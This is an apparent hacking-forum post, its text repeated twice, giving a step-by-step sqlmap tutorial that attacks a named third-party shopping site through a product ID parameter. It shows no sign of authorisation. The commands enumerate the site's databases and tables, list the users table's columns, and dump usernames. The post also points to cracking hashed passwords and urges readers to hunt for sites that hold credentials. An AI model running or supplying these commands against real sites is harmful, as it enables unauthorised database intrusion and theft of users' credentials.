- Joined
- May 15, 2017
- Messages
- 986
- Likes
- 759
- Points
- 1,045
First of all questions;
Which is better, SqlMap, Havij or SQLi Dumper?
Honestly they all have great characteristics and the all do thing's a little bit differently. If you can't dump a database in Havij try SQLi Dumper and reverse. But if both fail try SqlMap.
Which is faster SqlMap, Havij or SQLi Dumper?
In order from slowest to quickest; Havij, SQLi Dumper, SqlMap.
When I download SqlMap it's a .py file? What is this and how do I run it?
.py is Python, it's a programming language.
To run it you can open: Run > Cmd > cd (SqlMap Installtion Path) > sqlmap.py blah blah blah
OR
Shift click in the installation folder containing sqlmap choose "Open Command Prompt Here" and simply type sqlmap.py blah blah blah.
Do I need to understand Python to use sqlmap?
No.
Where can I download sqlmap?
===============TUTORIAL===============
Revealed content
First off open the command prompt in the sqlmap installation path.
Second find the link that you want to dump for tutorial purposes we will be using this link:
Code:
Now that we have our link we wish to map out we are going to run this command.
sqlmap.py - u http://www.marstair.com/products.php?catid=14999999.9 --dbs
And you're going to receive this on your screen:
Go ahead and tap y and press the enter button, after which your screen might look like this:
For this link we will tap y and press enter again. You will receive this message:
Aaaggaainnn tap y and press enter.
Now this screen might take a little bit depending on connection speed, etc. so let it run it's course and once it has your screen is going to end up looking like this:
Now for this specific link this is a good spot to tap n and press enter but if you wish you may test them all
-----------------------------------------------------------------------------------------
Now if you were smart and pressed the n button like I did you're gonna receive 2 databases (outlined in the red box)
The information schema is what actually allows us to not do blind injection which could take a while considering it have to test every symbol available on the keyboard for each column (a-z, 0-9, symbols, etc) if it is a blind injection it will test through everyone until the correct symbol, number, letter, returns true. Luckily for us we don't need to!
So the database we want is the marstair1 database and how we're going to open it is by issuing this command:
Code:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 marstair1 --tables
What this is going to do is get every table for us! Wow easy right? Unfortunately for me it also got the Information schema tables but hey no big deal It's just going to take me a little bit longer to fetch all the tables.
Now that we have dumped all the tables you can either view them in the cmd prompt or check the log that it saved it in! the save path is is C:\Users\(user)\.sqlmap\output So for me in this case I will check: C:\Users\William\.sqlmap\output. You will see a file called "log" just go ahead and open that in your favorite text editior! (notepad, notepad++, etc)
Here's the view from cmd: And here's from the text document:
Okay! So now we've gotten over database named marstar1 with all the tables included! Now the table that catches my eye is the users table I'm gonna go a little bit deeper into that one and get the columns of it by using this command:
Code:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 -T users --columns
Great now we got all the columns of the users table! Just so we don't lose each other this is what it looks like:
Here's the view from cmd: And here's from the text document:
What a spree of luck
In here there's the Id's, emails, usernames and passwords!
So I'm going to choose username and dump that first by typing this:
Code:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 -T users -C username --dump
NOTE: adding --threads 10 at the end of this command can make things faster! (Only for good connections)
I don't think I'll have to post a picture for you to notice we didn't find anything in the username's column! unfortunately there's nothing to be found here but if you do happen to find a website that does have usernames and passwords you can find all the dumped data in the folders I gave before!
Sorry this website didn't have anything in it but I wanted to keep that part out simply to give you guys courage to explore with sqlmap!
HINT: IF THE PASSWORD IS HASHED YOU CAN USE THE BUILT-IN DEHASHER IN SQLMAP!
Which is better, SqlMap, Havij or SQLi Dumper?
Honestly they all have great characteristics and the all do thing's a little bit differently. If you can't dump a database in Havij try SQLi Dumper and reverse. But if both fail try SqlMap.
Which is faster SqlMap, Havij or SQLi Dumper?
In order from slowest to quickest; Havij, SQLi Dumper, SqlMap.
When I download SqlMap it's a .py file? What is this and how do I run it?
.py is Python, it's a programming language.
To run it you can open: Run > Cmd > cd (SqlMap Installtion Path) > sqlmap.py blah blah blah
OR
Shift click in the installation folder containing sqlmap choose "Open Command Prompt Here" and simply type sqlmap.py blah blah blah.
Do I need to understand Python to use sqlmap?
No.
Where can I download sqlmap?
===============TUTORIAL===============
Revealed content
First off open the command prompt in the sqlmap installation path.
Second find the link that you want to dump for tutorial purposes we will be using this link:
Code:
Now that we have our link we wish to map out we are going to run this command.
sqlmap.py - u http://www.marstair.com/products.php?catid=14999999.9 --dbs
And you're going to receive this on your screen:
Go ahead and tap y and press the enter button, after which your screen might look like this:
For this link we will tap y and press enter again. You will receive this message:
Aaaggaainnn tap y and press enter.
Now this screen might take a little bit depending on connection speed, etc. so let it run it's course and once it has your screen is going to end up looking like this:
Now for this specific link this is a good spot to tap n and press enter but if you wish you may test them all
-----------------------------------------------------------------------------------------
Now if you were smart and pressed the n button like I did you're gonna receive 2 databases (outlined in the red box)
The information schema is what actually allows us to not do blind injection which could take a while considering it have to test every symbol available on the keyboard for each column (a-z, 0-9, symbols, etc) if it is a blind injection it will test through everyone until the correct symbol, number, letter, returns true. Luckily for us we don't need to!
So the database we want is the marstair1 database and how we're going to open it is by issuing this command:
Code:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 marstair1 --tables
What this is going to do is get every table for us! Wow easy right? Unfortunately for me it also got the Information schema tables but hey no big deal It's just going to take me a little bit longer to fetch all the tables.
Now that we have dumped all the tables you can either view them in the cmd prompt or check the log that it saved it in! the save path is is C:\Users\(user)\.sqlmap\output So for me in this case I will check: C:\Users\William\.sqlmap\output. You will see a file called "log" just go ahead and open that in your favorite text editior! (notepad, notepad++, etc)
Here's the view from cmd: And here's from the text document:
Okay! So now we've gotten over database named marstar1 with all the tables included! Now the table that catches my eye is the users table I'm gonna go a little bit deeper into that one and get the columns of it by using this command:
Code:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 -T users --columns
Great now we got all the columns of the users table! Just so we don't lose each other this is what it looks like:
Here's the view from cmd: And here's from the text document:
What a spree of luck
In here there's the Id's, emails, usernames and passwords!So I'm going to choose username and dump that first by typing this:
Code:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 -T users -C username --dump
NOTE: adding --threads 10 at the end of this command can make things faster! (Only for good connections)
I don't think I'll have to post a picture for you to notice we didn't find anything in the username's column! unfortunately there's nothing to be found here but if you do happen to find a website that does have usernames and passwords you can find all the dumped data in the folders I gave before!
Sorry this website didn't have anything in it but I wanted to keep that part out simply to give you guys courage to explore with sqlmap!
HINT: IF THE PASSWORD IS HASHED YOU CAN USE THE BUILT-IN DEHASHER IN SQLMAP!